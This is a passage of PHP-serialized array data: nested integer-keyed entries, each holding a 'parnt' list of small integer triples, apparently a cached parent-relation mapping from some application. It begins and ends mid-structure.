i:48;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:210;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:210;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:37;i:1;i:0;i:2;i:1;}}}i:16;a:1:{s:5:\"parnt\";a:3:{i:0;a:3:{i:0;i:211;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:212;i:1;i:0;i:2;i:2;}i:2;a:3:{i:0;i:213;i:1;i:0;i:2;i:3;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:214;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:215;i:1;i:0;i:2;i:1;}}}}i:306;a:1:{i:74;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:216;i:1;i:0;i:2;i:1;}}}}i:307;a:2:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}}i:308;a:3:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:26;i:1;i:0;i:2;i:1;}}}}i:309;a:8:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:141;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:202;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:118;i:1;i:0;i:2;i:1;}}}i:38;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:217;i:1;i:0;i:2;i:1;}}}}i:310;a:4:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:128;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:161;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:218;i:1;i:0;i:2;i:1;}}}}i:311;a:4:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:219;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}}i:312;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:313;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:314;a:5:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:120;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:315;a:2:{i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:220;i:1;i:0;i:2;i:1;}}}}i:316;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:9;i:1;i:0;i:2;i:1;}}}}i:317;a:3:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:221;i:1;i:0;i:2;i:1;}}}}i:318;a:1:{i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:220;i:1;i:0;i:2;i:1;}}}}i:319;a:5:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:222;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:41;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:223;i:1;i:0;i:2;i:1;}}}}i:320;a:2:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:321;a:1:{i:21;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:32;i:1;i:0;i:2;i:1;}}}}i:322;a:4:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:224;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:225;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}}i:323;a:2:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:324;a:2:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}}i:325;a:2:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}}i:326;a:1:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:68;i:1;i:0;i:2;i:1;}}}}i:328;a:4:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:163;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:226;i:1;i:0;i:2;i:1;}}}}i:329;a:7:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:33;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:60;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:41;i:1;i:0;i:2;i:1;}}}}i:330;a:4:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}}i:331;a:4:{i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:189;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:189;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}}i:332;a:2:{i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:333;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:334;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:335;a:1:{i:10;a:1:{s:5:\"parnt\";a:2:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}i:1;a:3:{i:0;i:219;i:1;i:0;i:2;i:2;}}}}i:336;a:6:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:68;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}}i:337;a:2:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:227;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:181;i:1;i:0;i:2;i:1;}}}}i:338;a:4:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:227;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:181;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}}i:339;a:1:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:228;i:1;i:0;i:2;i:1;}}}}i:340;a:6:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:229;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}}i:341;a:4:{i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:8;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:230;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:224;i:1;i:0;i:2;i:1;}}}}i:342;a:3:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:231;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}}i:343;a:1:{i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:229;i:1;i:0;i:2;i:1;}}}}i:344;a:4:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}}i:345;a:13:{i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:232;i:1;i:0;i:2;i:1;}}}i:41;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:56;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:233;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:16;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:75;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:234;i:1;i:0;i:2;i:1;}}}i:76;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:67;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:190;i:1;i:0;i:2;i:1;}}}}i:346;a:5:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:235;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:235;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:235;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:236;i:1;i:0;i:2;i:1;}}}}i:347;a:3:{i:75;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:237;i:1;i:0;i:2;i:1;}}}i:76;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:1;i:2;i:1;}}}i:69;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:156;i:1;i:0;i:2;i:1;}}}}i:348;a:5:{i:49;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:1;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:1;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:32;i:1;i:1;i:2;i:1;}}}i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:32;i:1;i:1;i:2;i:1;}}}}i:349;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:350;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:351;a:1:{i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:352;a:1:{i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}}i:353;a:4:{i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:238;i:1;i:0;i:2;i:1;}}}i:24;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:65;i:1;i:0;i:2;i:1;}}}}i:354;a:10:{i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:108;i:1;i:0;i:2;i:1;}}}i:5;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:238;i:1;i:0;i:2;i:1;}}}i:22;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:32;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:19;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}}i:355;a:1:{i:23;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:356;a:9:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}}i:357;a:10:{i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:61;i:1;i:0;i:2;i:1;}}}}i:358;a:2:{i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:55;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:78;i:1;i:0;i:2;i:1;}}}}i:359;a:2:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}}i:360;a:3:{i:32;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:103;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:104;i:1;i:0;i:2;i:1;}}}i:53;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:95;i:1;i:0;i:2;i:1;}}}}i:361;a:4:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:13;i:1;i:0;i:2;i:1;}}}i:50;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:239;i:1;i:0;i:2;i:1;}}}}i:362;a:2:{i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:11;i:1;i:0;i:2;i:1;}}}}i:363;a:13:{i:44;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:66;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:42;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:68;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:13;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:3;i:1;i:0;i:2;i:1;}}}i:40;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:28;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:240;i:1;i:0;i:2;i:1;}}}i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:30;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:10;i:1;i:0;i:2;i:1;}}}}i:364;a:7:{i:34;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:18;i:1;i:0;i:2;i:1;}}}i:9;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:4;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:10;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:35;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:177;i:1;i:0;i:2;i:1;}}}i:20;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}}i:365;a:5:{i:3;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:8;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:77;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:101;i:1;i:0;i:2;i:1;}}}i:17;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:23;i:1;i:0;i:2;i:1;}}}i:78;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:241;i:1;i:0;i:2;i:1;}}}}i:366;a:2:{i:1;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:1;i:1;i:0;i:2;i:1;}}}i:2;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:2;i:1;i:1;i:2;i:1;}}}}i:367;a:10:{i:29;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:6;i:1;i:0;i:2;i:1;}}}i:15;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:98;i:1;i:0;i:2;i:1;}}}i:41;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:113;i:1;i:0;i:2;i:1;}}}i:56;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:14;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:5;i:1;i:0;i:2;i:1;}}}i:11;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:7;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:14;i:1;i:0;i:2;i:1;}}}i:12;a:1:{s:5:\"parnt\";a:1:{i:0;a:3:{i:0;i:4;i:1;i:0;i:2;i:1;}}}i:6;a:1:{s:5:\